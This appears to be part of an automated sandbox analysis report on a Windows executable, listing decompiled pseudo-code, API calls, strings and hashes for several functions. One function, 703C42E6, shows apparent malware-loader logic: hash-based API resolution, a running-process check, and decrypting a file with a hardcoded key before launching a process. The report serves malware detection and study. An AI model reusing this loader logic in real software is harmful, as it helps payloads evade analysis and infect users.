Part of subcall function 00405374: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
Part of subcall function 00405374: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
Part of subcall function 00405374: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401786
C:\Users\user\AppData\Local\Temp\nsr575.tmp\System.dll, xrefs: 00401826, 00401842
Call, xrefs: 00401775, 0040177E, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsr575.tmp\System.dll$Call
API String ID: 1941528284-4223674282
Opcode ID: 557ef526f42ec28edab53691d762c079f4bd310eaf31ddc110736b3ad8fce03f
Instruction ID: 5f47ace1ae7a1eefb157477671532b43bdd4633c8b8a9d03c9106597174e7376
Opcode Fuzzy Hash: 557ef526f42ec28edab53691d762c079f4bd310eaf31ddc110736b3ad8fce03f
Instruction Fuzzy Hash: 7E418431900515BACF107BB58D45EAF3679DF05368F20827FF422B20E1DA7C9A529A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0040583A, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040583A(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408384;
				_v36.Group = 0x408384;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408374;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405845
0x00405849
0x0040584c
0x00405852
0x00405856
0x0040585a
0x00405862
0x00405869
0x0040586f
0x00405876
0x0040587d
0x00405885
0x00405887
0x00000000
0x00405887
0x00405891
0x00405898
0x004058ae
0x00000000
0x00000000
0x00000000
0x004058b0
0x004058b4

APIs

CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040587D
GetLastError.KERNEL32 ref: 00405891
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004058A6
GetLastError.KERNEL32 ref: 004058B0

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405860
C:\Users\user\Desktop, xrefs: 0040583A

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
API String ID: 3449924974-3254906087
Opcode ID: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
Instruction ID: 86bcb966140a1f7c96d74b09234fd9797acdbeb10da2454792965a81b57d7874
Opcode Fuzzy Hash: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
Instruction Fuzzy Hash: 80011A72D00219DAEF10DFA0C944BEFBBB8EF04355F00803ADA45B6290D7799659CF99

Uniqueness

Uniqueness Score: -1.00%

Function 004065E8, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065E8(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}

0x004065ff
0x00406608
0x0040660a
0x0040660a
0x0040660e
0x00406620
0x0040661a
0x0040661a
0x0040661a
0x00406624
0x00406638
0x0040664c
0x00406653

APIs

GetSystemDirectoryA.KERNEL32 ref: 004065FF
wsprintfA.USER32 ref: 00406638
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040664C

Strings

%s%s.dll, xrefs: 00406632
UXTHEME, xrefs: 004065F1
\, xrefs: 00406610

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
Instruction ID: 7902db4e393e31f005eed81eae05c73ad43ba894215c6af4be7b8d9a3309d3f8
Opcode Fuzzy Hash: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
Instruction Fuzzy Hash: 26F0217050020967EB149764DD0DFFB375CAB08304F14047BA586F10D1DAB9D5358F6D

Uniqueness

Uniqueness Score: -1.00%

Function 703C42E6, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E703C42E6(void* __ecx, void* __edx, void* __eflags, WCHAR* _a4) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				long _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				char _v140;
				char _v208;
				char _v1248;
				signed int _t124;
				void* _t126;
				void* _t130;
				signed int _t131;
				void* _t132;
				int _t134;
				int _t137;
				signed int _t147;
				void* _t149;
				signed int _t150;
				void* _t152;
				signed int _t153;
				void* _t155;
				void* _t156;
				void* _t157;
				void* _t158;
				void* _t159;

				_t159 = __eflags;
				_t157 = __edx;
				_t156 = __ecx;
				_v20 = _v20 & 0x00000000;
				_v84 = _v84 & 0x00000000;
				_v56 = 0x32;
				_v55 = 0x31;
				_v54 = 0x63;
				_v53 = 0x32;
				_v52 = 0x61;
				_v51 = 0x65;
				_v50 = 0x31;
				_v49 = 0x63;
				_v48 = 0x33;
				_v47 = 0x62;
				_v46 = 0x33;
				_v45 = 0x30;
				_v44 = 0x34;
				_v43 = 0x63;
				_v42 = 0x63;
				_v41 = 0x61;
				_v40 = 0x38;
				_v39 = 0x66;
				_v38 = 0x37;
				_v37 = 0x31;
				_v36 = 0x62;
				_v35 = 0x30;
				_v34 = 0x37;
				_v33 = 0x65;
				_v32 = 0x66;
				_v31 = 0x36;
				_v30 = 0x62;
				_v29 = 0x38;
				_v28 = 0x36;
				_v27 = 0x35;
				_v26 = 0x39;
				_v25 = 0x37;
				_v24 = 0;
				_v16 = _v16 & 0x00000000;
				_v116 = _v116 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v8 = E703C45AA();
				_v60 = E703C4652(_v8, 0x34cf0bf);
				_v64 = E703C4652(_v8, 0x55e38b1f);
				_v68 = E703C4652(_v8, 0xd1775dc4);
				_v120 = E703C4652(_v8, 0xd6eb2188);
				_v96 = E703C4652(_v8, 0xa2eae210);
				_v124 = E703C4652(_v8, 0xcd8538b2);
				_v72 = E703C4652(_v8, 0x8a111d91);
				_v76 = E703C4652(_v8, 0x170c1ca1);
				_v80 = E703C4652(_v8, 0xa5f15738);
				_v88 = E703C4652(_v8, 0x433a3842);
				_v92 = E703C4652(_v8, 0x2ffe2c64);
				_v112 = 0x2d734193;
				_v108 = 0x63daa681;
				_v104 = 0x26090612;
				_v100 = 0x6f28fae0;
				_t124 = 4;
				_t126 = E703C4243(_t159,  *((intOrPtr*)(_t158 + _t124 * 0 - 0x6c))); // executed
				_t160 = _t126;
				if(_t126 != 0) {
					L4:
					_v60(0x7918);
					L5:
					_v68(0,  &_v1248, 0x103);
					_t130 = CreateFileW(_a4, 0x80000000, 7, 0, 3, 0x80, 0);
					_v20 = _t130;
					if(_v20 != 0xffffffff) {
						_t131 = _v76(_v20, 0);
						_v16 = _t131;
						__eflags = _v16 - 0xffffffff;
						if(_v16 != 0xffffffff) {
							_t132 = VirtualAlloc(0, _v16, 0x3000, 4);
							_v12 = _t132;
							__eflags = _v12;
							if(_v12 != 0) {
								_t134 = ReadFile(_v20, _v12, _v16,  &_v84, 0);
								__eflags = _t134;
								if(_t134 != 0) {
									_t99 =  &_v56; // 0x32
									E703C4047(_v12, _t99, 0x20);
									_t137 = E703C3034(_t156, _t157, __eflags, _v12); // executed
									__eflags = _t137;
									if(_t137 != 0) {
										_v60(0xbb8);
										E703C3005(_t156,  &_v140, 0x10);
										E703C3005(_t156,  &_v208, 0x44);
										_t137 = _v96( &_v1248, _v92(0, 0, 0, 0x20, 0, 0,  &_v208,  &_v140));
										__eflags = _t137;
										if(_t137 != 0) {
											_t137 = _v64(0);
										}
									}
									ExitProcess(0);
								}
								return _t134;
							}
							return _t132;
						}
						return _t131;
					}
					return _t130;
				}
				_t147 = 4;
				_t149 = E703C4243(_t160,  *((intOrPtr*)(_t158 + (_t147 << 0) - 0x6c))); // executed
				_t161 = _t149;
				if(_t149 != 0) {
					goto L4;
				}
				_t150 = 4;
				_t152 = E703C4243(_t161,  *((intOrPtr*)(_t158 + (_t150 << 1) - 0x6c))); // executed
				_t162 = _t152;
				if(_t152 != 0) {
					goto L4;
				}
				_t153 = 4;
				_t155 = E703C4243(_t162,  *((intOrPtr*)(_t158 + _t153 * 3 - 0x6c))); // executed
				if(_t155 == 0) {
					goto L5;
				}
				goto L4;
			}

0x703c42e6
0x703c42e6
0x703c42e6
0x703c42ef
0x703c42f3
0x703c42f7
0x703c42fb
0x703c42ff
0x703c4303
0x703c4307
0x703c430b
0x703c430f
0x703c4313
0x703c4317
0x703c431b
0x703c431f
0x703c4323
0x703c4327
0x703c432b
0x703c432f
0x703c4333
0x703c4337
0x703c433b
0x703c433f
0x703c4343
0x703c4347
0x703c434b
0x703c434f
0x703c4353
0x703c4357
0x703c435b
0x703c435f
0x703c4363
0x703c4367
0x703c436b
0x703c436f
0x703c4373
0x703c4377
0x703c437b
0x703c437f
0x703c4383
0x703c438c
0x703c439c
0x703c43ac
0x703c43bc
0x703c43cc
0x703c43dc
0x703c43ec
0x703c43fc
0x703c440c
0x703c441c
0x703c442c
0x703c443c
0x703c443f
0x703c4446
0x703c444d
0x703c4454
0x703c445d
0x703c4465
0x703c446a
0x703c446c
0x703c44a6
0x703c44ab
0x703c44ae
0x703c44bc
0x703c44d4
0x703c44d7
0x703c44de
0x703c44ea
0x703c44ed
0x703c44f0
0x703c44f4
0x703c4507
0x703c450a
0x703c450d
0x703c4511
0x703c4527
0x703c452a
0x703c452c
0x703c4532
0x703c4539
0x703c4541
0x703c4546
0x703c4548
0x703c454f
0x703c455b
0x703c4569
0x703c4593
0x703c4596
0x703c4598
0x703c459c
0x703c459c
0x703c4598
0x703c45a1
0x703c45a1
0x00000000
0x703c452c
0x00000000
0x703c4511
0x00000000
0x703c44f4
0x00000000
0x703c44de
0x703c4470
0x703c4478
0x703c447d
0x703c447f
0x00000000
0x00000000
0x703c4483
0x703c448a
0x703c448f
0x703c4491
0x00000000
0x00000000
0x703c4495
0x703c449d
0x703c44a4
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 703C4243: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 703C4288

CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 703C44D4

Part of subcall function 703C4243: Process32FirstW.KERNEL32(000000FF,0000022C), ref: 703C42AC

VirtualAlloc.KERNELBASE(00000000,000000FF,00003000,00000004), ref: 703C4507

Part of subcall function 703C4243: Process32NextW.KERNEL32(000000FF,0000022C), ref: 703C42D7

ReadFile.KERNELBASE(000000FF,00000000,000000FF,00000000,00000000), ref: 703C4527
ExitProcess.KERNEL32(00000000), ref: 703C45A1

Strings

21c2ae1c3b304cca8f71b07ef6b86597, xrefs: 703C4532, 703C4535

Memory Dump Source

Source File: 00000000.00000002.213465230.00000000703C3000.00000040.00020000.sdmp, Offset: 703C0000, based on PE: true

Associated: 00000000.00000002.213449488.00000000703C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.213454915.00000000703C1000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.213460076.00000000703C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.213470666.00000000703C5000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFileProcess32$AllocExitFirstNextProcessReadSnapshotToolhelp32Virtual
String ID: 21c2ae1c3b304cca8f71b07ef6b86597
API String ID: 1567874941-3245158632
Opcode ID: f5b54c74f550dbccd660df952d7addbd6687d87794f11ca36633288a2e0022e8
Instruction ID: 6c62595ea9c734d90c62f9e66d4fe9120ad38b762211ee4676f41c1177c689c4
Opcode Fuzzy Hash: f5b54c74f550dbccd660df952d7addbd6687d87794f11ca36633288a2e0022e8
Instruction Fuzzy Hash: 80916930D04288EEFF129BE4CC4ABDEBFBAAF05714F104069E650BA1D1D7B64A15CB21

Uniqueness

Uniqueness Score: -1.00%

Function 004032BF, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004032BF(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t30;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t36;
				intOrPtr _t48;

				_t33 =  *0x429464 -  *0x40b898 + _a4;
				 *0x42f450 = GetTickCount() + 0x1f4;
				if(_t33 <= 0) {
					L22:
					E00402E52(1);
					return 0;
				}
				E0040343E( *0x429474);
				SetFilePointer( *0x40a01c,  *0x40b898, 0, 0); // executed
				 *0x429470 = _t33;
				 *0x429460 = 0;
				while(1) {
					_t30 = 0x4000;
					_t11 =  *0x429468 -  *0x429474;
					if(_t11 <= 0x4000) {
						_t30 = _t11;
					}
					_t12 = E00403428(0x41d460, _t30);
					if(_t12 == 0) {
						break;
					}
					 *0x429474 =  *0x429474 + _t30;
					 *0x40b8a0 = 0x41d460;
					 *0x40b8a4 = _t30;
					L6:
					L6:
					if( *0x42f454 != 0 &&  *0x42f500 == 0) {
						 *0x429460 =  *0x429470 -  *0x429464 - _a4 +  *0x40b898;
						E00402E52(0);
					}
					 *0x40b8a8 = 0x415460;
					 *0x40b8ac = 0x8000;
					if(E0040677B(0x40b8a0) < 0) {
						goto L20;
					}
					_t35 =  *0x40b8a8; // 0x415f40
					_t36 = _t35 - 0x415460;
					if(_t36 == 0) {
						__eflags =  *0x40b8a4; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t30;
						if(_t30 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x429464;
						if(_t16 -  *0x40b898 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E00405E8D( *0x40a01c, 0x415460, _t36); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40b898 =  *0x40b898 + _t36;
					_t48 =  *0x40b8a4; // 0x0
					if(_t48 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

0x004032cf
0x004032e2
0x004032e7
0x00403417
0x00403419
0x00000000
0x0040341f
0x004032f3
0x00403306
0x0040330c
0x00403312
0x0040331d
0x00403322
0x00403327
0x0040332f
0x00403331
0x00403331
0x0040333a
0x00403341
0x00000000
0x00000000
0x00403347
0x0040334d
0x00403353
0x00000000
0x00403359
0x0040335f
0x0040337f
0x00403384
0x00403389
0x0040338f
0x00403395
0x004033a6
0x00000000
0x00000000
0x004033a8
0x004033ae
0x004033b0
0x004033d3
0x004033d9
0x00000000
0x00000000
0x004033db
0x004033dd
0x00000000
0x00000000
0x004033df
0x004033df
0x004033f2
0x00000000
0x00000000
0x00403401
0x00000000
0x00403401
0x004033ba
0x004033c1
0x0040340e
0x00403414
0x00403414
0x00000000
0x00403414
0x004033c3
0x004033c9
0x004033cf
0x00000000
0x00000000
0x00000000
0x00403412
0x00403412
0x00000000
0x00403412
0x00000000

APIs

GetTickCount.KERNEL32 ref: 004032D3

Part of subcall function 0040343E: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313E,?), ref: 0040344C

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031E9,00000004,00000000,00000000,?,?,00403165,000000FF,00000000,00000000,0040A130,?), ref: 00403306
SetFilePointer.KERNELBASE(?,00000000,00000000,0040B8A0,0041D460,00004000,?,00000000,004031E9,00000004,00000000,00000000,?,?,00403165,000000FF), ref: 00403401

Strings

@_A, xrefs: 0040338F, 004033A8
`TA, xrefs: 00403318

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer$CountTick
String ID: @_A$`TA
API String ID: 1092082344-4188502979
Opcode ID: ddf88972be424b0b842bd0ca3aed5b91ca801b40ce3928dce7bc125f03cf72b3
Instruction ID: bb82d22d1a80a93a7495f99719332701a8bc5653d470bc60fdd2df8261a6fa09
Opcode Fuzzy Hash: ddf88972be424b0b842bd0ca3aed5b91ca801b40ce3928dce7bc125f03cf72b3
Instruction Fuzzy Hash: 3A31B3726042159FDB10BF29EE849263BACFB40359B88813BE405B62F1C7785C428A9D

Uniqueness

Uniqueness Score: -1.00%

Function 00405E15, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E15(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3ec; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}

0x00405e19
0x00405e1f
0x00405e20
0x00405e20
0x00405e25
0x00405e26
0x00405e29
0x00405e33
0x00405e40
0x00405e43
0x00405e4b
0x00000000
0x00000000
0x00405e4f
0x00000000
0x00000000
0x00405e51
0x00000000
0x00405e51
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405E29
GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405E43

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405E18
nsa, xrefs: 00405E20
"C:\Users\user\Desktop\lpdKSOB78u.exe" , xrefs: 00405E15

Memory Dump Source

Source File: 00000000.00000002.211058940.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.211048716.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211076911.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.211093563.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211104465.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211112400.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211118690.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.211124637.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\lpdKSOB78u.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2464025690
Opcode ID: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
Instruction ID: 94097d04b6c38ee8b1870d6a931f35239ed30ef0cd20ec9d97f11959184772c3
Opcode Fuzzy Hash: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
Instruction Fuzzy Hash: E4F0A7363442087BDB109F55EC44B9B7B9DDF91750F14C03BF984DA1C0D6B0D9988798

Uniqueness

Uniqueness Score: -1.00%

Function 704816DB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E704816DB(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v88;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x7048405c = _a8;
				 *0x70484060 = _a16;
				 *0x70484064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x70484038, E70481556);
				_push(1); // executed
				_t37 = E70481A98(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E704822AF(_t54);
					}
					E704822F1(_t67, _t54);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_t37 = E704824D8(_t54);
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x818; // 0x818
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E7048156B(_t54,  &_v88);
								 *(_t54 + 0x834) =  *(_t54 + 0x834) & 0x00000000;
								_t18 = _t54 + 0x818; // 0x818
								_t72 = _t18;
								 *((intOrPtr*)(_t54 + 0x820)) = _t42;
								 *_t72 = 3;
								E704824D8(_t54);
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							E704824D8(_t54);
							_t37 = GlobalFree(E70481266(E70481559(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E7048249E(_t54);
							if(( *(_t54 + 0x810) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x808);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x810) & 0x00000020) != 0) {
								_t37 = E704814E2( *0x70484058);
							}
						}
						if(( *(_t54 + 0x810) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E70482CC3(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E70482A38(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E704826B2(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x704816db
0x704816db
0x704816db
0x704816e5
0x704816ed
0x704816fa
0x70481708
0x7048170b
0x7048170d
0x70481712
0x70481717
0x70481836
0x70481836
0x7048171d
0x70481721
0x70481724
0x70481729
0x7048172b
0x70481731
0x70481737
0x70481767
0x7048176e
0x70481792
0x704817dd
0x70481794
0x70481794
0x70481795
0x7048179b
0x7048179c
0x704817a6
0x704817a9
0x704817ae
0x704817b5
0x704817b5
0x704817bc
0x704817c2
0x704817c8
0x704817d5
0x704817d6
0x704817d9
0x70481770
0x70481771
0x70481786
0x70481786
0x704817e7
0x704817ea
0x704817f7
0x704817fe
0x70481806
0x70481809
0x70481809
0x70481806
0x70481816
0x7048181e
0x70481823
0x70481816
0x7048182b
0x00000000
0x7048182d
0x00000000
0x7048182e
0x7048182b
0x7048173b
0x7048173e
0x7048175c
0x00000000
0x00000000
0x7048175f
0x70481764
0x70481764
0x70481766
0x00000000
0x70481766
0x70481740
0x70481741
0x70481749
0x7048174a
0x00000000
0x7048174a
0x70481743
0x70481744
0x70481752
0x00000000
0x70481752
0x70481747
0x00000000
0x00000000
0x00000000
0x70481747

APIs

Part of subcall function 70481A98: GlobalFree.KERNEL32 ref: 70481D09
Part of subcall function 70481A98: GlobalFree.KERNEL32 ref: 70481D0E
Part of subcall function 70481A98: GlobalFree.KERNEL32 ref: 70481D13

GlobalFree.KERNEL32 ref: 70481786
FreeLibrary.KERNEL32(?), ref: 70481809
GlobalFree.KERNEL32 ref: 7048182E

Part of subcall function 704822AF: GlobalAlloc.KERNEL32(00000040,?), ref: 704822E0

Part of subcall function 704826B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,70481757,00000000), ref: 70482782

Part of subcall function 7048156B: wsprintfA.USER32 ref: 70481599

Strings

, xrefs: 7048180F

Memory Dump Source

Source File: 00000000.00000002.213483594.0000000070481000.00000020.00020000.sdmp, Offset: 70480000, based on PE: true

Associated: 00000000.00000002.213476460.0000000070480000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.213490804.0000000070483000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.213497394.0000000070485000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: 636fbef54cf5d8923a39e1f1ad1825c8b71b4cf8a98b6d6ad95621b514e215f9
Instruction ID: e6328d7a20b4ccc19f699d89193876973dad422f74696d2d4fe197a99f21e4c5
Opcode Fuzzy Hash: 636fbef54cf5d8923a39e1f1ad1825c8b71b4cf8a98b6d6ad95621b514e215f9
Instruction Fuzzy Hash: 1F414F725002049ECB01AF64DD85B9E37BCBB05219F148C7EF907AA3E6DB7C9845C7A1

Uniqueness

Uniqueness Score: -1.00%

